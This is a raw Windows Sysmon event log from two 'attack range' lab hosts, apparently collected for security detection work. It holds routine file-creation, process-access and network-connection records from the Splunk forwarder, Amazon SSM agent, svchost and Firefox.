154100x8000000000000000295615Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:21.444{C8EA50B7-1569-6216-CF06-000000003802}7128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000295614Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:21.165{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=051CE53AA052FB3DD55129A1BB7C37AB,SHA256=5CBC9365CF68731BBC26FA550EBBE9E4E1209015F87E50D9118A65D434CABB51,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295613Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:21.029{C8EA50B7-1568-6216-CE06-000000003802}44846760C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000219714Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:22.729{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-150MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219713Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:22.257{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=195721090268DF5599C58836FCB2AD55,SHA256=4E8EC3BEB6FB4AB5904E3118799C1B1281EE54BA612052517E8DC38C78DCB57C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295623Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:22.197{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EB5C2D1023930EC3AEA6C22DF7AB27C,SHA256=CFE5D56D840BD13DD20FF6DDB5C93D9781CC063E33CCD689521279DB5CF57BA3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219717Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:21.657{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51536-false10.0.1.12-8000- 23542300x8000000000000000219716Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:23.729{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-151MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219715Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:23.290{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93C158ECA525C28334DAF17D6CD25776,SHA256=207115CEA2CE7FBA7C22B5106FC373A26FBF9DB897C2117D74E7C3CF811D7E7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295624Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:23.197{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E693424E2A177BCA8BB9B5826E23A4F6,SHA256=DF861171F689700E23B8639B7274642B0DEBBF68629FD6527FA9E2CE48A30A52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295625Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:24.212{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBA7DF2087118E7696A38D7C6BE2D3C4,SHA256=5931A2FC69C538BBFC570033C205280B4F7AB0F686BB31A6DC4346CAFD633C4C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219720Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:21.950{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx62431-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219719Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:24.885{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B7AB1E74231C9DEEC9F8C321D73E4DA9,SHA256=6A7D5387D3F23B322121407B2F62FC3E164FCA62E8BFDE52462D2DE796CE35DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219718Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:24.354{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B291405676EA86FDAA704FC7748CA779,SHA256=D9D86B28AD0D0B340146C741C8112DF6627542063A153D67F5B5B48A52EABF27,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295631Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:25.995{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55bd0|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad 10341000x8000000000000000295630Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:25.995{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+556b1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295629Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:25.979{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RF8df493.TMPMD5=C788ACA089D90F3A1A6EC3105767DB64,SHA256=342A88EE39B2F3B46C5FF775B5CA8B205D1F4E2D15CC4151DC918B0596F20C38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295628Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:25.227{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C4A86949D1D5AF8B4AA6BA8605BD758,SHA256=FE251E03040C1783BE62E174DAFC5E7F56D54AD08506344D37DA6DF2F39D9B6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219721Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:25.354{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AF53D6E0AF97F1A543CDD6BC8F55607,SHA256=A41382B9B127595A0296487B9170B4D7C48C0B429B318DD0ABE09F5142C9A1A4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295627Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:22.655{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49252-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000295626Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:25.012{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\aborted-session-pingMD5=5F29CFE0E5D8A9FE69E4EEAF94AF44F6,SHA256=E91174F86B2953F036C9CC29F24F5FB0A7A3F71465A5D0C2E00EF9A79B44CA6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295632Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:26.228{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC3869C792672424557B9E2A5B0FED54,SHA256=35E4DD872D2D769A2F526C9EB41899500E62BA938CB18DA6A05F4945E39423D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219722Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:26.464{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28E552F38636AB445AA7ABAC4F71DBE6,SHA256=28445B58DE9F8A797E28F4BD5F9E5E397124EF17773334A5A8726B5A1528CF98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219723Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:27.465{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=311A40DC6CDA69BEEF28E362EC5DF6C8,SHA256=E9C09F07CD822FBE95792B295BD9DD9DFB597225F61C1F5644FB664B8AD3E61E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295633Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:27.233{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B8FE1A7EA675B109193161FCB1F9B29,SHA256=94927E83A44B877C291476B8F16E0CA2CC5C0B7C1D1DAA57026152633CB89C4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219725Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:28.481{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7EDA201BEA6CA212BDBEFAB3E8D2C7C,SHA256=03684EFA85ACDA4C42274C2A7B8D57DDD48B8E0D88D9F1A77581B0437848E2FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295634Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:28.248{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DC306F69A11BC45140A5951DBFA2751,SHA256=0C7D5AA7E7839DE7692B5931684D124E3EB0F25EC1F185DDDFC43FCAECE7667F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219724Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:25.661{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx56893-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219728Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:29.716{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D5D7C526278118AAA81BA953A3886C8,SHA256=838954F1A2D85B665E9F2C64C71050652BFF372CAF8485D07C01706CE925DC9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295635Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:29.248{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A1B07F31D61484E3EDABBD1DF5B27EE,SHA256=8A8591464849E02F64923CB94D3789BA67E0035C318AFA18CA86CC70D6B83553,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219727Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:29.450{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FE4E94124961D362A496758CD114B7D6,SHA256=83CE57FA6CB1F30795D8E46706FDFA983674F50DE7027DEEF1D0D145FCB6004C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219726Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:26.679{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51537-false10.0.1.12-8000- 23542300x8000000000000000219730Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:30.763{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D902AA0CC79410CADF78E4B0653E82E4,SHA256=C509E0CF6AC8D0D86E29D5DB90F04B5F1F6F473D946A2408E66C963D5CF350E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295636Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:30.266{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=340E2D15FE4148C0ABDF83FEA6480592,SHA256=6F4DB5E53548F3D1E8B47DD3782FBFF6FF2A817944208D2EAAD4E65FB05F0571,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219729Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:30.403{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=79412E52DC06D81CB5333C2983BFF5DD,SHA256=2604A8268DBF4886078FD70F39FA833D8A27C4939E5013C77ADAC571F0327793,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295639Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:31.431{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=30EA335375AC25AB0B2FAC51AD3F79F3,SHA256=D3A0A8B56B4CA9341C4FD27B9556EA4C8A36415ECAF47F9CBA8059102424DFAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295638Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:31.300{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFF0974E988C64292E24614BA36491BF,SHA256=6A948A270266520CF30982DD11E4622500E5AE31B38F85870F009E7A1830876D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295637Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:28.590{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49253-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000295640Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:32.317{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5801A2F4DD8F4CC178BB280A6A3138BC,SHA256=92AC13EBBB50F9D64D5620447D8BAC34BDD1E033F2117E447F01A7A3C071AC69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219733Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:32.889{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=333336BE76ECD0888F5458B7CE34C735,SHA256=B724A19C2FE639307EBC4C7C4524B8602FFFEA9643FA114AE6384451F3BD7DFF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219732Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:29.937{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx63489-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219731Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:31.998{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C3E5B6C2CE194DFFC9360987E58157E,SHA256=189ACAC338D5A5F55C25164C3E74B5BC2F11BD249D61A11D08D88394926230D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295642Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:33.485{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=0645A4818688E65C613CC8C88A21E3DE,SHA256=8C1FFA8833500F71FDA001E15C7C939025CC731F529118A62731FDB716F0D954,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295641Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:33.332{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA2AFE18131239FD38C0FFF4F6DA83E2,SHA256=D5A95F3322D601DE11353EC8354E1E332449B1F545FF20AFC5D6D55141814BE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219734Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:33.061{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1FBB272A7EAACBF1E745FC004076232,SHA256=A25271DA1655972A8D0E93BCABB11174315ED5F01CC67B5E032DEBAEC13AF059,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295643Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:34.347{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A3BA6B38E793195AEFF245ADE0305FD,SHA256=B1562735B227F24BA39110E112A2CCB5E2C26A97EEE5CE5B398B43AE92849971,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219735Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:34.064{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FAA8DFC1C24295299057A2CF4716F21,SHA256=941CFE667E8BF48521F4AF43DB16E354320B746611703868B51E08B23A465A2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295644Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:35.368{C8EA50B7-F144-6215-7700-000000003802}3964NT 